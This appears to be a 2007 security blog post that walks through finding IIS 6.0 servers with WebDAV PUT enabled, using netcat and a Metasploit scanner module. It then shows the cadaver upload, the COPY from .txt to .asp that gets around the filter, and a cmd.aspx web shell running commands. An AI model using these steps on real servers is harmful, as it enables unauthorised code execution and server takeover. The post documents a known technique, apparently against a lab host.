Basically i wanted to do:
cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private
cg@segfault:~/evil/msf3$
but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.
cg@segfault:~/evil/msf3$ ./msfconsole
____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux
msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >
i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.
**more on getting code on the box once you find a PUT
cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109
then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...
**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.
cadaver http://www.webdav.org/cadaver/
cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit
from there you will want to upload your cmd.asp so you can execute commands on the box.
Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVsJtExeOABpCUvVQXMEa_iBai0XV49xb6CUH3RjQljC1ZXYPEvaYGPAicfuXLoYGN-luAX8m8G4l6mdWd-KduSOTSxsWxQUr3ulAFlHvHLJ390Zjj8NbiQCxLwW6SRmL1eDkWxUL-VVk/s400/upload-asp.jpg)
Interacting with out cmdx.aspx to list the directory contents of the C drive
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMO4W5eE3cJOK0IBKeKTnsslnXFo6BCFjR7D6UxA6xteacKc8BnpyRR5U8ZcsL3PQq7z-PysQEWYQK9IqwLGh95uAsVr22s4hWotQl9oYpgjxN70UTWFhIavuCNh9wRoN9gYZxmxkmSj8/s400/cmdx-aspx.jpg)
-CG
No comments:
Post a Comment